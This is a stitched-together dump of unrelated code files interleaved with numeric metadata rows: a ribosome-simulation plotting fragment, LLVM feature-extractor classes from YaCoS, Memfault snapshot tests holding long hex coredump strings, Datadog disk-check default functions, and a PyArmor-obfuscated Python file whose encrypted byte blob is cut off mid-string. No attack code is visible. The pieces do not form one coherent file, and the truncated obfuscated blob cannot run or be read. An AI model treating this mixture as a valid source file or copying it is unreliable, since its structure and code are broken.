k_add = np.hstack((k_enters.flatten(),k_pauses.flatten(),k_stops.flatten(),k_jumps.flatten() ))
t_array_copy = np.copy(t_array)
while t_array_copy.shape[0] != 200:
t_array_copy = np.vstack((t_array_copy,t_array))
for i in range(n_trajectories):
result = np.zeros((len(t_array)*N_rib),dtype=np.int32)
frapresult = np.zeros((len(t_array)*N_rib),dtype=np.int32)
ribtimes = np.zeros((400),dtype=np.float64)
coltimes = np.zeros((400),dtype=np.int32)
ssa_translation_generic_lowmem.run_SSA_generic(result,ribtimes,coltimes, kelong,frapresult,t_array, np.array([0,0,0],dtype=np.float64), seeds[i],nribs, k_add.flatten() ,len(k_enters),len(k_pauses),len(k_stops),len(k_jumps))
all_results[i,:] = result
all_frapresults[i,:] = frapresult
all_coltimes[i,:] = coltimes
all_ribtimes[i,:] = ribtimes
all_ribs[i,:] = nribs[0]
traj = all_results[0,:].reshape((N_rib,len(t_array))).T
f,ax = plt.subplots(2,1)
ax[0].set_ylim([0,300])
ax[0].fill_between([0,400],[100,100],color='red',alpha=.2)
ax[0].fill_between([0,400],[200,200],color='green',alpha=.2)
ax[0].fill_between([0,400],[300,300],color='blue',alpha=.2)
ax[0].plot(traj,'.')
ax[0].set_xlabel('Time')
ax[0].set_ylabel('Ribosome Location')
ax[0].set_title(' 100 codons, enters: 0,10 2,20 stops: 0,50 and 2,80' )
spatial_x = (traj + (traj > 100) + (traj > 199))%100
ax[1].set_ylim([0,100])
#ax[1].plot(t_array,spatial_x,'.')
ax[1].plot(t_array_copy.T[traj<=100],spatial_x[traj <= 100],'r.')
ax[1].plot(t_array_copy.T[traj>100],spatial_x[traj > 100],'g.')
ax[1].plot(t_array_copy.T[traj>199],spatial_x[traj > 199],'b.')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('Ribosome Location')
ax[1].set_title(' spatial location ' )
ax[1].legend(['0','+1','+2'])
| 28.567613 | 229 | 0.66281 | 3,152 | 17,112 | 3.417513 | 0.055838 | 0.058485 | 0.061084 | 0.046417 | 0.897605 | 0.884423 | 0.877831 | 0.875046 | 0.866134 | 0.858708 | 0 | 0.095942 | 0.11863 | 17,112 | 598 | 230 | 28.615385 | 0.618287 | 0.066503 | 0 | 0.768116 | 0 | 0.005797 | 0.044968 | 0 | 0 | 0 | 0.00285 | 0 | 0 | 1 | 0.014493 | false | 0 | 0.011594 | 0.005797 | 0.04058 | 0.014493 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8fd05ccbe3ba85cc4233cfa03a02a7f24edced6f | 7,976 | py | Python | yacos/info/compy/llvm_vec.py | ComputerSystemsLaboratory/YaCoS | abd5d3c6e227e5c7a563493f7855ebf58ba3de05 | [
"Apache-2.0"
] | 8 | 2022-02-03T16:41:01.000Z | 2022-02-09T11:29:20.000Z | yacos/info/compy/llvm_vec.py | ComputerSystemsLaboratory/YaCoS | abd5d3c6e227e5c7a563493f7855ebf58ba3de05 | [
"Apache-2.0"
] | null | null | null | yacos/info/compy/llvm_vec.py | ComputerSystemsLaboratory/YaCoS | abd5d3c6e227e5c7a563493f7855ebf58ba3de05 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2021 Anderson Faustino da Silva.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
from absl import logging as lg
from yacos.info.compy.extractors.extractors import ClangDriver
from yacos.info.compy.extractors.extractors import LLVMDriver
from yacos.info.compy.extractors.extractors import LLVMIRExtractor
class LLVMHistogramBuilder():
"""Milepost Static Features."""
def __init__(self, driver=None):
"""Initialize the representation."""
if driver:
self.__driver = driver
else:
self.__driver = ClangDriver(
ClangDriver.ProgrammingLanguage.C,
ClangDriver.OptimizationLevel.O3,
[],
["-Wall"],
)
self.__extractor = LLVMIRExtractor(self.__driver)
def source_to_info(self, filename, additional_include_dir=None):
"""Extract the representation from source code."""
if not isinstance(self.__driver, ClangDriver):
lg.error('source_to_info needs ClangDriver')
sys.exit(1)
if additional_include_dir:
self.__driver.addIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
info = self.__extractor.HistogramFromSource(filename)
if additional_include_dir:
self.__driver.removeIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
return info
def ir_to_info(self, filename):
"""Extract representation from IR."""
if not isinstance(self.__driver, LLVMDriver):
lg.error('ir_to_info needs LLVMDriver')
sys.exit(1)
info = self.__extractor.HistogramFromIR(filename)
return info
class LLVMOpcodesBuilder():
"""Milepost Static Features."""
def __init__(self, driver=None):
"""Initialize the representation."""
if driver:
self.__driver = driver
else:
self.__driver = ClangDriver(
ClangDriver.ProgrammingLanguage.C,
ClangDriver.OptimizationLevel.O3,
[],
["-Wall"],
)
self.__extractor = LLVMIRExtractor(self.__driver)
def source_to_info(self, filename, additional_include_dir=None):
"""Extract the representation from source code."""
if not isinstance(self.__driver, ClangDriver):
lg.error('source_to_info needs ClangDriver')
sys.exit(1)
if additional_include_dir:
self.__driver.addIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
info = self.__extractor.OpcodesFromSource(filename)
if additional_include_dir:
self.__driver.removeIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
return info
def ir_to_info(self, filename):
"""Extract representation from IR."""
if not isinstance(self.__driver, LLVMDriver):
lg.error('ir_to_info needs LLVMDriver')
sys.exit(1)
info = self.__extractor.OpcodesFromIR(filename)
return info
class LLVMMSFBuilder():
"""Milepost Static Features."""
def __init__(self, driver=None):
"""Initialize the representation."""
if driver:
self.__driver = driver
else:
self.__driver = ClangDriver(
ClangDriver.ProgrammingLanguage.C,
ClangDriver.OptimizationLevel.O3,
[],
["-Wall"],
)
self.__extractor = LLVMIRExtractor(self.__driver)
def source_to_info(self, filename, additional_include_dir=None):
"""Extract the representation from source code."""
if not isinstance(self.__driver, ClangDriver):
lg.error('source_to_info needs ClangDriver')
sys.exit(1)
if additional_include_dir:
self.__driver.addIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
info = self.__extractor.MSFFromSource(filename)
if additional_include_dir:
self.__driver.removeIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
return info
def ir_to_info(self, filename):
"""Extract representation from IR."""
if not isinstance(self.__driver, LLVMDriver):
lg.error('ir_to_info needs LLVMDriver')
sys.exit(1)
info = self.__extractor.MSFFromIR(filename)
return info
class LLVMLoopBuilder():
"""Loop Features."""
def __init__(self, driver=None):
"""Initialize the representation."""
if driver:
self.__driver = driver
else:
self.__driver = ClangDriver(
ClangDriver.ProgrammingLanguage.C,
ClangDriver.OptimizationLevel.O3,
[],
["-Wall"],
)
self.__extractor = LLVMIRExtractor(self.__driver)
def source_to_info(self, filename, additional_include_dir=None):
"""Extract the representation from source code."""
if not isinstance(self.__driver, ClangDriver):
lg.error('source_to_info needs ClangDriver')
sys.exit(1)
if additional_include_dir:
self.__driver.addIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
info = self.__extractor.LoopFromSource(filename)
if additional_include_dir:
self.__driver.removeIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
return info
def ir_to_info(self, filename):
"""Extract representation from IR."""
if not isinstance(self.__driver, LLVMDriver):
lg.error('ir_to_info needs LLVMDriver')
sys.exit(1)
info = self.__extractor.LoopFromIR(filename)
return info
class LLVMIR2VecBuilder():
"""Globals and Functions names."""
def __init__(self, driver=None):
"""Initialize the representation."""
if driver:
self.__driver = driver
else:
self.__driver = ClangDriver(
ClangDriver.ProgrammingLanguage.C,
ClangDriver.OptimizationLevel.O3,
[],
["-Wall"],
)
self.__extractor = LLVMIRExtractor(self.__driver)
def source_to_info(self, filename, additional_include_dir=None):
"""Extract info from the source code."""
if not isinstance(self.__driver, ClangDriver):
lg.error('source_to_info needs ClangDriver')
sys.exit(1)
if additional_include_dir:
self.__driver.addIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
info = self.__extractor.IR2VecFromSource(filename)
if additional_include_dir:
self.__driver.removeIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
return info
def ir_to_info(self, filename):
"""Extract info from the IR."""
if not isinstance(self.__driver, LLVMDriver):
lg.error('ir_to_info needs LLVMDriver')
sys.exit(1)
info = self.__extractor.IR2VecFromIR(filename)
return info
| 32.823045 | 72 | 0.621364 | 785 | 7,976 | 6.04586 | 0.170701 | 0.084282 | 0.105352 | 0.037927 | 0.80847 | 0.80847 | 0.80847 | 0.780657 | 0.780657 | 0.780657 | 0 | 0.004619 | 0.294258 | 7,976 | 242 | 73 | 32.958678 | 0.838515 | 0.15158 | 0 | 0.787879 | 0 | 0 | 0.048055 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.030303 | 0 | 0.212121 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8f324661f13d17bbb102d193e8e253f54de66e7a | 2,939 | py | Python | scripts/tests/snapshots/snap_test_memfault_gdb.py | ExploramedNC7/memfault-firmware-sdk | 4c418795e5de9f97b87e5966751dc35027238d65 | [
"BSD-3-Clause"
] | null | null | null | scripts/tests/snapshots/snap_test_memfault_gdb.py | ExploramedNC7/memfault-firmware-sdk | 4c418795e5de9f97b87e5966751dc35027238d65 | [
"BSD-3-Clause"
] | null | null | null | scripts/tests/snapshots/snap_test_memfault_gdb.py | ExploramedNC7/memfault-firmware-sdk | 4c418795e5de9f97b87e5966751dc35027238d65 | [
"BSD-3-Clause"
] | null | null | null | #
# Copyright (c) 2019-Present Memfault, Inc.
# See License.txt for details
#
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots[
"test_coredump_writer 1"
] = "434f52450100000002010000000000000000000054000000000000000101010102020202030303030404040405050505060606060707070708080808090909090a0a0a0a0b0b0b0b0c0c0c0c0d0d0d0d0e0e0e0e0f0f0f0f101010101111111112121212131313131414141402000000000000000d0000006465766963655f73657269616c0a0000000000000005000000312e302e300b00000000000000040000006d61696e0400000000000000090000006764622d70726f746f070000000000000004000000280000000500000000000000040000000500000001000000fcffffff04000000a288485d01000000040000000b00000068656c6c6f20776f726c64"
snapshots[
"test_coredump_command_with_login_no_existing_release_or_symbols[None--fixture2.bin] 1"
] = "434f524501000000a101100000000000000000005400000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000001000000044454d4f53455249414c4e554d4245520a0000000000000012000000312e302e302d6d64352b62363162326436630b00000000000000040000006d61696e040000000000000008000000444556424f415244070000000000000004000000280000000500000000000000040000000500000001000000fcffffff04000000a288485d0100000000ed00e08f00000041414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141410100000000000020000010004141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141"
snapshots[
"test_coredump_command_with_login_no_existing_release_or_symbols[None--r 0x600000 8 -r 0x800000 4-fixture3.bin] 1"
] = "434f524501000000b901000000000000000000005400000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000001000000044454d4f53455249414c4e554d4245520a0000000000000012000000312e302e302d6d64352b62363162326436630b00000000000000040000006d61696e040000000000000008000000444556424f415244070000000000000004000000280000000500000000000000040000000500000001000000fcffffff04000000a288485d0100000000ed00e08f0000004141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141010000000000600008000000414141414141414101000000000080000400000041414141"
| 122.458333 | 1,006 | 0.953386 | 75 | 2,939 | 37.026667 | 0.666667 | 0.014044 | 0.022686 | 0.020166 | 0.048254 | 0.048254 | 0.048254 | 0.048254 | 0.048254 | 0.048254 | 0 | 0.806632 | 0.025179 | 2,939 | 23 | 1,007 | 127.782609 | 0.162653 | 0.044913 | 0 | 0.25 | 0 | 0 | 0.934643 | 0.911429 | 0 | 1 | 0.005714 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8f46ae88b28dd50d7ecf53842c2c28f57da3f24c | 2,701 | py | Python | disk/datadog_checks/disk/config_models/defaults.py | kjmadscience/integrations-core | 663bdf44730dd6c9f3565c121318b320bfcb4988 | [
"BSD-3-Clause"
] | null | null | null | disk/datadog_checks/disk/config_models/defaults.py | kjmadscience/integrations-core | 663bdf44730dd6c9f3565c121318b320bfcb4988 | [
"BSD-3-Clause"
] | null | null | null | disk/datadog_checks/disk/config_models/defaults.py | kjmadscience/integrations-core | 663bdf44730dd6c9f3565c121318b320bfcb4988 | [
"BSD-3-Clause"
] | null | null | null | # (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# This file is autogenerated.
# To change this file you should edit assets/configuration/spec.yaml and then run the following commands:
# ddev -x validate config -s <INTEGRATION_NAME>
# ddev -x validate models -s <INTEGRATION_NAME>
from datadog_checks.base.utils.models.fields import get_default_field_value
def shared_device_global_exclude(field, value):
return get_default_field_value(field, value)
def shared_file_system_global_exclude(field, value):
return get_default_field_value(field, value)
def shared_mount_point_global_exclude(field, value):
return get_default_field_value(field, value)
def shared_service(field, value):
return get_default_field_value(field, value)
def instance_all_partitions(field, value):
return False
def instance_blkid_cache_file(field, value):
return get_default_field_value(field, value)
def instance_create_mounts(field, value):
return get_default_field_value(field, value)
def instance_device_exclude(field, value):
return get_default_field_value(field, value)
def instance_device_include(field, value):
return get_default_field_value(field, value)
def instance_device_tag_re(field, value):
return get_default_field_value(field, value)
def instance_disable_generic_tags(field, value):
return False
def instance_empty_default_hostname(field, value):
return False
def instance_file_system_exclude(field, value):
return get_default_field_value(field, value)
def instance_file_system_include(field, value):
return get_default_field_value(field, value)
def instance_include_all_devices(field, value):
return True
def instance_metric_patterns(field, value):
return get_default_field_value(field, value)
def instance_min_collection_interval(field, value):
return 15
def instance_min_disk_size(field, value):
return 0
def instance_mount_point_exclude(field, value):
return get_default_field_value(field, value)
def instance_mount_point_include(field, value):
return get_default_field_value(field, value)
def instance_service(field, value):
return get_default_field_value(field, value)
def instance_service_check_rw(field, value):
return False
def instance_tag_by_filesystem(field, value):
return False
def instance_tag_by_label(field, value):
return True
def instance_tags(field, value):
return get_default_field_value(field, value)
def instance_timeout(field, value):
return 5
def instance_use_lsblk(field, value):
return False
def instance_use_mount(field, value):
return False
| 21.95935 | 105 | 0.784154 | 384 | 2,701 | 5.190104 | 0.257813 | 0.306071 | 0.224787 | 0.170597 | 0.647265 | 0.647265 | 0.551932 | 0.551932 | 0.514802 | 0.514802 | 0 | 0.003896 | 0.144761 | 2,701 | 122 | 106 | 22.139344 | 0.858874 | 0.125879 | 0 | 0.438596 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.491228 | false | 0 | 0.017544 | 0.491228 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
8f4a9e1efd52f671e235cede6cca635e2be72fa2 | 14,035 | py | Python | src/entitlements/django.py | MoveBigRocks/entitlements | 30a512ff6be0a4089d3edae985d5deadb3006d0d | [
"MIT"
] | null | null | null | src/entitlements/django.py | MoveBigRocks/entitlements | 30a512ff6be0a4089d3edae985d5deadb3006d0d | [
"MIT"
] | null | null | null | src/entitlements/django.py | MoveBigRocks/entitlements | 30a512ff6be0a4089d3edae985d5deadb3006d0d | [
"MIT"
] | null | null | null | __pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x09\x00\x61\x0d\x0d\x0a\x08\x2d\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x6b\x0d\x00\x00\x00\x00\x00\x10\xcc\xe4\x3f\xa3\xae\x34\x44\x4c\x70\xa3\x47\x46\x50\x32\xbe\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x76\xeb\x10\xb0\xb2\xff\xf6\x04\xff\xa5\x0c\x2c\x23\xa4\xd2\x45\xde\xd2\xc0\x0a\x6d\x6b\xc7\xec\xea\xc2\x1c\xb8\xf9\x49\xb0\x7e\x77\xad\x60\x6e\x38\x91\x7a\xad\x34\x27\xd7\xd0\x7b\x94\xba\xfc\xf7\xe8\x4d\x45\x6a\x87\xca\x28\x3a\x59\xb9\x3f\xa9\xed\xa0\x9b\xc0\x08\x67\x62\xa1\x05\x99\x09\x89\x0e\x17\xaf\xc6\xaa\xcd\xca\xcc\x79\x72\xfb\xed\x64\x9f\xf9\x9d\xe5\x40\xf2\xdd\x49\x3c\x00\xab\x5c\x63\xa0\xdf\x6f\xee\xa2\x7f\x2c\xd6\x08\xa1\x69\x1d\x9d\x04\x6e\xc0\x09\x7c\xc5\x45\x4b\xa3\x28\x97\xd2\x29\x6c\x7a\x28\x42\x92\x0f\x4b\x42\x01\xea\xe5\x39\x75\x02\xc7\x52\xac\x97\x3d\x94\x42\x96\x67\x52\xfe\x98\x86\xdb\xa1\xe5\x56\xd9\xe5\x32\x8c\x54\xc3\x4b\xed\x5d\xbf\x93\x8c\xef\x30\xad\xee\x0f\x56\xa1\xbb\x44\xe9\x89\xbc\xbf\x56\xbe\xda\xa4\xcc\x04\x63\x5f\xea\x1f\xfe\xa0\x92\xb4\x48\x79\x30\x9e\xf7\xd0\x01\x9b\x39\xf3\x60\xf6\xe0\xa4\x79\xdc\xb2\x17\x67\x99\x17\x24\x46\x1f\xf4\xb2\x4f\xa3\x38\xad\x0e\x03\xf0\xa0\x24\xad\x75\x54\x9c\xe8\x54\x93\xfc\x76\xf3\x3d\x66\x88\xa2\xd0\xec\xed\xf5\x2c\x99\x9f\xe4\xec\x43\x0a\xeb\xdc\x28\x65\xe4\xf1\xb0\xf0\x05\x42\x75\x80\x8a\x19\x31\x59\x0a\x4a\x9e\x9b\xa5\xf4\x81\x27\xa9\xbe\x1b\x38\x24\x88\x71\x06\x2f\xf2\x3c\xa8\xb0\xcb\x04\x40\x71\xe9\x27\x9e\xaf\xba\xde\x47\xc2\x52\x3d\x53\xcd\x52\x8e\xd8\xc8\xf4\xa8\x1b\x11\x16\x0d\x58\x01\x79\xe1\xc2\x1b\xe4\x1f\xed\x8c\xdf\x43\x50\x84\x2d\x46\x8a\xd5\x7c\x0c\x2c\xa0\xdd\xb9\xb0\xf1\x05\xa6\x69\xcf\xa1\xab\xd8\x7b\x08\x98\xf2\xba\xf1\x0f\x2a\xb2\xea\xc9\x90\x1e\xd5\x4b\xfb\xab\x16\xe2\xdc\x50\x26\x43\x50\x6b\x7c\x8a\xb7\xba\x37\x3e\x3f\x71\x68\xcf\x17\xb9\x22\x5d\x0d\x00\xad\x4b\xcb\x6b\x87\xbb\x58\x04\xcd\xd6\x06\x5e\x02\x22\xe2\xbd\xe5\x72\xab\xc7\x40\x75\xd4\x6a\xdb\x64\xf4\x2a\x78\xc8\x9e\x08\x65\x38\x4a\x95\xd8\x87\x50\xa3\x6d\xf1\xdb\xb9\x85\xac\xff\xf2\x8e\x98\x50\x68\x8d\xa2\x4e\xb3\x5c\xcd\x52\xdf\x6b\xb0\x33\x19\xc5\x09\x42\xec\xc2\x02\xd8\x7a\x7b\x55\xc0\x51\xcd\x42\x7c\x90\x20\x56\x58\x5d\xde\x53\x20\xe7\xfd\x0c\xb6\xda\x36\xda\xc4\x3e\xd0\x77\x3a\x09\xa1\x84\x87\xe9\xd7\x4b\x5d\x4e\x5f\xb9\x33\x51\x6f\x2a\xfd\xa0\x70\x86\xc4\x4a\xb7\xc0\xd3\x24\x6c\xe8\xa3\x5b\x99\x36\x73\xc7\x28\x4d\x9d\x70\x77\xe4\xe6\x3d\x5d\xc4\x28\x71\x76\x20\xe0\xfc\x08\x29\xb7\xb1\xeb\x8a\x88\x81\x20\x4b\x31\xe2\xb6\xf6\x48\x66\x7a\x77\x63\xba\x48\x10\x50\xf0\xd8\x9b\x80\x57\x38\x10\xd6\x86\x4c\x3b\x5e\xa8\xd2\x09\x0b\xec\x27\x0d\x58\x54\xe1\x34\x80\xfb\x3a\x16\xfa\x5b\x23\x58\x6f\x44\x78\x32\x1a\xcf\xa9\x0e\x69\x13\x48\x5e\xbc\xd2\x87\x86\x5e\xe0\xf0\x10\x33\x01\x79\xc8\x7e\x3d\x92\x63\xd1\x91\x0a\xae\xd6\x74\x0a\xa6\x3a\x21\xad\xfc\xf4\xd9\xc1\x4d\xa9\x74\x45\xc0\x75\x49\x25\xf3\x30\x43\xb2\x31\x74\xe6\x48\x48\xe4\xf4\xc0\xf0\x1d\x4d\x1e\x3f\xb0\x68\x56\x01\x72\xf4\x4b\xe9\xd5\x25\xbb\x46\xaf\x33\xac\x40\x7a\x29\xbf\x5c\xec\x90\xd4\x5d\xe5\x2e\xce\x6c\xe5\x86\xb5\xb2\xe2\x4d\x56\x72\x97\x6e\xef\x5f\x2e\x18\xb4\x0e\xec\xb5\x27\xaa\x54\xf2\x98\x5b\xa0\xac\xef\x11\x48\x0b\xa8\xab\x78\x91\x3c\x57\xff\x23\xd0\xc7\xdf\x64\x22\x39\xc5\x02\xac\xee\x4f\x57\xae\xf8\xc1\xf0\x9b\x54\xdf\xd3\x38\x10\x95\x00\x55\x32\x6e\x6b\x69\xa4\xd1\x4c\x56\x68\xc0\x54\x5d\x3a\x55\x47\xf4\x1b\x89\xb7\x40\x14\xf0\xeb\x1b\x55\xd0\x95\x3e\x76\x90\xdd\x81\x3c\x71\xa8\xa5\xce\x3f\x54\xbb\xe8\xbd\x85\xc3\xc9\x20\xeb\xde\xd1\xcb\x4e\xb0\xd5\x22\xcd\xe4\xeb\xc5\x3b\x5d\xb0\x9a\xcd\xfa\xc8\xab\x43\x89\xb5\x69\x84\x4b\x95\xd3\x62\xa3\x06\xdb\xf6\xbf\xf0\x59\xc5\x04\x44\x59\xb3\xfc\x70\x94\xe4\x74\xaa\x2f\xb6\x1f\x28\xd9\x66\x9a\xde\x93\xec\x43\x26\x58\xb4\xdc\xc2\xdc\xa9\xbe\xd8\x47\xf7\x49\xe8\x84\xe1\x42\xac\xf0\x2b\xaf\x2f\xf1\x54\x8a\x0f\x79\x18\xd5\xa5\x09\x84\x57\x26\x11\xac\x2c\x2e\x06\xbf\xb2\x92\x78\xe0\x50\xa6\xfd\xe6\x6e\x77\x07\x8e\x45\x55\x05\x4d\xc7\xcf\x74\x5c\x90\x7f\x41\xd5\xa1\x39\xb5\xc1\xee\x90\xcb\x77\x17\xf6\xc9\xf6\x2f\x3f\xbb\x84\x36\xd6\xd1\xb5\x12\x2d\x8c\xa8\xe1\x5b\x5a\x05\x84\xb2\xb4\xcc\x58\x15\xd2\xb5\x61\x90\xb6\xb9\x6b\x00\xbb\x95\x6a\x47\x31\x10\xb5\x8e\xb3\x0f\x29\x76\x7e\x60\x3d\xa0\xd7\x25\xca\xa3\xa3\xab\x20\x3d\x5d\xfa\x6a\xe3\x52\x1b\x54\x14\x5b\x81\xc7\xd3\xef\xa9\x61\x16\x88\x26\x11\x62\xec\x9b\x30\xd1\xe9\x4c\x57\x4a\x10\xf3\x3d\x93\xfe\xc6\x14\x7c\x6f\x34\x88\xd0\x30\xbb\x53\x72\x5a\x7b\x4a\xe5\xb4\x57\x75\xa5\x8d\xce\x25\xf4\x15\xaa\x40\x2e\x9b\x16\x41\x7f\xd8\x5a\x3d\x0e\xd7\x9d\x92\x80\x4a\x36\xed\x3a\xb0\xc6\xb0\xb7\xfe\x1d\x40\xc2\x24\x73\x9b\xd1\x12\xcb\xa8\xfd\xd1\x16\xf9\xb2\x25\x8b\xbb\x30\xa9\x2c\x71\x16\xb5\x3e\x0d\x5c\x59\x6c\x01\x9e\x25\x10\x06\x4f\x6f\x1e\xa3\x18\x07\x28\xa6\x79\xaf\x22\xf9\x96\x80\x8e\x62\xa3\xbe\x4d\xf0\x07\xb2\xd8\xb5\x07\x23\x52\x13\x69\x49\x21\xf6\x75\xc6\x23\xda\xb9\x89\x10\x47\x24\x0b\x9b\x0a\x9a\xae\x67\xa9\x0f\xa4\x6a\x31\x4d\x6e\xb1\xcb\x15\x44\xdb\x3e\x77\x78\x85\x2f\x97\x8d\x2e\x7f\xf5\x15\x24\x54\xf3\xb3\xb1\x1d\xc0\xd7\x8b\x4b\x09\x5e\x0e\xca\x75\x47\x6a\xa3\x04\xe9\x38\x6f\x55\x2a\xd0\xfd\xf2\x91\xa1\xa6\xcd\x2f\x02\x14\x8a\xa7\xd6\x51\x5a\xd2\xb2\x63\xa9\x79\x8b\x8e\xa4\x59\x09\x9b\xd2\x2d\xb1\x88\xb3\xbf\x3f\x1c\x51\x86\x66\x18\x14\xf1\x30\xdf\xd2\xaa\x12\x34\x6a\xb1\x64\xb4\xa8\x59\x9f\x2d\x05\xb0\x59\xb0\xeb\x1b\x29\xfa\xdc\xbd\x1f\x02\x5a\xc2\x94\xaf\x0a\x53\xd0\x15\x65\xc0\xf0\x4a\xc7\x0d\x73\x1f\x64\x02\x53\x2c\x17\x66\x63\x45\xb5\x35\x25\x5d\x9b\xd1\x84\xbc\xd4\xeb\xeb\x63\x4a\x45\x49\x52\x75\x67\xd6\x32\x0e\xdf\x2a\x08\xc0\xfa\x8a\xb2\xca\xf9\xdb\xca\xc6\x17\x14\xdc\x07\x5d\x6d\x8a\xd9\xa5\x46\x3e\x81\x8e\xe9\x6f\xbc\xa1\xe9\xf7\x64\x45\x7b\xce\x9e\xa2\x5d\x1a\xc2\x3d\x6f\x59\x29\x3a\xcb\x7d\xef\x79\xa9\x95\x4d\xbb\xfe\x30\xb2\xd0\xf5\x5e\x1d\x7a\x18\xb9\x2f\x24\x0a\xf2\xa6\x59\xb2\x7c\xd4\x30\x4c\xb8\xd7\xda\x8c\x7a\x6f\x68\x11\x93\xbc\x19\x17\x3e\x9f\x82\x3b\x5e\x0b\x7a\xfd\x4a\x93\xb9\xef\xed\x1e\xe8\x1a\x05\xee\x20\x3c\x59\x53\x81\x4c\xea\x29\x85\xd2\xcf\x31\x47\x2d\x70\xb8\xc6\xfc\x76\xdc\xb8\xb4\x02\xfb\xf2\xee\xf8\x4d\xe1\x2e\x85\xa5\xbb\x1d\x6e\xe2\x81\x3b\x02\x2a\xf8\x82\x0a\x2c\xad\x2d\x00\xe0\x48\x1b\x2c\x15\xe0\x8c\x68\x17\xa1\x1a\xa6\x78\xd8\x57\xc8\xd3\xfc\xe4\x66\xb1\x38\x5d\x56\x3a\x0b\x77\x6d\x43\xad\x98\x1b\x37\xd5\x58\x44\x2b\xaf\x8f\x16\x20\x07\x54\x19\xb1\xbb\xa5\x50\x2b\x65\x20\x09\x10\xdb\x7a\x9c\x95\xfc\xfb\xf8\x03\x0c\xa2\x49\xd0\x44\x30\xd1\x05\x3f\xab\x55\x93\x81\x37\x64\x73\x01\x34\x4e\x29\x15\x16\xcd\x47\x7b\x14\x13\x1e\x60\x55\x11\x52\xcd\x67\x74\xd7\x38\x30\x54\xba\x10\x4d\x3b\x89\xdd\x1a\x53\x2a\xf0\xf5\x98\x4d\xe5\xa8\xa2\x42\x17\x44\xed\xcd\x0e\xd4\x1e\xca\x34\x5e\xd5\xd3\xe5\x72\xa1\x80\x10\xd7\xae\x87\x63\xc3\xe9\x69\x6e\xcf\x02\x57\xfb\x03\x05\x63\x30\x21\xce\x61\xa9\x0c\x27\xc4\x74\xf8\xf8\xf0\x2d\xb8\x87\x78\x31\x36\xa3\x23\xea\xa6\x14\x3f\x79\xd8\xed\x43\x69\xba\x22\x14\x3c\xf7\x95\x50\x5c\x93\x60\x09\x2e\xd8\xec\xaa\xdc\x4a\x27\xef\xfe\x43\xfb\x82\x99\x07\x82\x2e\x65\xd9\xff\xb7\xb6\xb5\x89\x25\x71\x0a\xcc\x74\xe6\x00\x81\x30\x0f\x56\x72\xc9\x63\x56\xd6\x94\x63\x93\xb0\x61\x3c\xee\xd3\x5a\xd4\x00\x88\x69\x95\xa2\xb7\x2a\x3b\x1d\x22\x7e\x58\x5c\x02\x01\x68\xf7\x64\xc8\xb2\xb9\xce\xa8\x2c\xc7\x9b\x26\x51\x08\xe0\x21\xe5\x59\x05\x42\xe8\x66\xc9\x24\x7b\x